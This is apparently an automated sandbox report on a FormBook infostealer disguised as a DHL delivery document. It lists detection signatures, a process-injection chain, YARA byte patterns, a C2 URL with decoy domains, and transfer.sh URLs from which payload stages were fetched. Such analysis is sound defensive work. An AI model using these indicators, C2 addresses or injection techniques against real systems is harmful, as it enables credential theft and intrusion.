Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Delivery Documents.exe

Overview

General Information

Sample Name:DHL Delivery Documents.exe
Analysis ID:562120
MD5:5bc8492c9f262d1f9840635b87edf9c5
SHA1:da867a8b837e43c91414ff46d239ab95b799d04b
SHA256:7a4424af54555e5a81f6fa4e2b2c42c6d19c71bbcc261cd1be14af245c3b711c
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • DHL Delivery Documents.exe (PID: 4592 cmdline: "C:\Users\user\Desktop\DHL Delivery Documents.exe" MD5: 5BC8492C9F262D1F9840635B87EDF9C5)
    • aspnet_compiler.exe (PID: 5360 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6760 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5848 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.trabaho-academy.net/zqzw/"], "decoy": ["laurentmathieu.com", "nohohonndana.com", "hhmc.info", "shophallows.com", "blazebunk.com", "goodbridge.xyz", "flakycloud.com", "bakermckenziegroups.com", "formation-adistance.com", "lovingearthbotanicals.com", "tbrservice.plus", "heritagehousehotels.com", "drwbuildersco.com", "lacsghb.com", "wain3x.com", "dadreview.club", "continiutycp.com", "cockgirls.com", "48mpt.xyz", "033skz.xyz", "gmconstructionlnc.com", "ms-mint.com", "aenrione.xyz", "honxuan.com", "snowmanvila.com", "cig-online.com", "valetvolley.com", "bjsnft.com", "bennystrom.com", "flw.ink", "clarissagrandiart.com", "samfamstudio.com", "pamschams.com", "edgar-regale.com", "combi-tech.tech", "00xwq.online", "eclipseconstrucciones.com", "plick-click.com", "dive.education", "regenelis.com", "blue-chipwordtoscan-today.info", "xn--rsso51aevf65u.com", "maonagrana.com", "lucasdebatintrader.com", "cassijohnson.com", "roeten.online", "into-concrete.xyz", "motovip.store", "floryfab.com", "slkykq.com", "vidyakala.com", "stairwaystowealth.com", "meganandbobbyprine.com", "arestradings.com", "emilyschlueter.com", "platanin.com", "hnhstudios.com", "dmembutidos.com", "dcassorealtor.com", "megamobil.wien", "001skz.xyz", "5t45urfgurkhgbvkhbuh.com", "a3hd.com", "newmexicotruckwrecklawyers.com"]}
SourceRuleDescriptionAuthorStrings
00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries
      SourceRuleDescriptionAuthorStrings
      7.0.aspnet_compiler.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.0.aspnet_compiler.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.0.aspnet_compiler.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        7.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.aspnet_compiler.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          System Summary

          barindex
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL Delivery Documents.exe" , ParentImage: C:\Users\user\Desktop\DHL Delivery Documents.exe, ParentProcessId: 4592, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 5360
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6760

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.trabaho-academy.net/zqzw/"], "decoy": ["laurentmathieu.com", "nohohonndana.com", "hhmc.info", "shophallows.com", "blazebunk.com", "goodbridge.xyz", "flakycloud.com", "bakermckenziegroups.com", "formation-adistance.com", "lovingearthbotanicals.com", "tbrservice.plus", "heritagehousehotels.com", "drwbuildersco.com", "lacsghb.com", "wain3x.com", "dadreview.club", "continiutycp.com", "cockgirls.com", "48mpt.xyz", "033skz.xyz", "gmconstructionlnc.com", "ms-mint.com", "aenrione.xyz", "honxuan.com", "snowmanvila.com", "cig-online.com", "valetvolley.com", "bjsnft.com", "bennystrom.com", "flw.ink", "clarissagrandiart.com", "samfamstudio.com", "pamschams.com", "edgar-regale.com", "combi-tech.tech", "00xwq.online", "eclipseconstrucciones.com", "plick-click.com", "dive.education", "regenelis.com", "blue-chipwordtoscan-today.info", "xn--rsso51aevf65u.com", "maonagrana.com", "lucasdebatintrader.com", "cassijohnson.com", "roeten.online", "into-concrete.xyz", "motovip.store", "floryfab.com", "slkykq.com", "vidyakala.com", "stairwaystowealth.com", "meganandbobbyprine.com", "arestradings.com", "emilyschlueter.com", "platanin.com", "hnhstudios.com", "dmembutidos.com", "dcassorealtor.com", "megamobil.wien", "001skz.xyz", "5t45urfgurkhgbvkhbuh.com", "a3hd.com", "newmexicotruckwrecklawyers.com"]}
          Source: DHL Delivery Documents.exeVirustotal: Detection: 30%Perma Link
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: www.trabaho-academy.net/zqzw/Avira URL Cloud: Label: malware
          Source: DHL Delivery Documents.exeJoe Sandbox ML: detected
          Source: 7.0.aspnet_compiler.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.aspnet_compiler.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49751 version: TLS 1.0
          Source: DHL Delivery Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: BNCXGAS.pdb source: DHL Delivery Documents.exe
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbBSJB source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmp, DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: msdt.exe, 0000000C.00000002.620930532.0000000005987000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000C.00000002.596381462.0000000003775000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then pop edi7_2_0040C3A9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi12_2_0313C3A9

          Networking

          barindex
          Source: Malware configuration extractorURLs: www.trabaho-academy.net/zqzw/
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: global trafficHTTP traffic detected: GET /get/mVKia7/BINCC.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1Host: transfer.sh
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49751 version: TLS 1.0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: DHL Delivery Documents.exe, 00000002.00000002.297310779.000000000146A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microf
          Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros.
          Source: DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: DHL Delivery Documents.exe, 00000002.00000002.300447432.000000001E2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
          Source: DHL Delivery Documents.exe, 00000002.00000002.297376238.0000000003AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
          Source: DHL Delivery Documents.exeString found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt
          Source: DHL Delivery Documents.exeString found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txt9BNCXGAS.Properties.ResourcesL
          Source: DHL Delivery Documents.exe, 00000002.00000002.297598334.0000000003B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/KkxDr1/bbbbbbbbbbb.txtx
          Source: DHL Delivery Documents.exeString found in binary or memory: https://transfer.sh/get/mVKia7/BINCC.txt
          Source: unknownDNS traffic detected: queries for: transfer.sh
          Source: global trafficHTTP traffic detected: GET /get/mVKia7/BINCC.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /get/KkxDr1/bbbbbbbbbbb.txt HTTP/1.1Host: transfer.sh

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.296093050.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.331650604.000000001025A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.592017625.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.296408181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.299090873.0000000013AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356715878.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356781952.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.596403511.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.586492056.0000000003130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: initial sampleStatic PE information: Filename: DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeStatic file information: Suspicious name
          Source: 7.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
